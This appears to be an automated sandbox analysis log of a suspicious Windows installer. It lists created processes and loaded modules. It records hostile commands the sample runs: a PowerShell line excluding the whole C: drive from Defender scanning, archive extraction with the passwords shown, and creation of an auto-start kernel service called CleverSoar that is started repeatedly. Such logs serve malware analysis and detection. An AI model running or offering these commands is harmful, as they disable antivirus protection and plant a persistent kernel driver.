Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile read: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
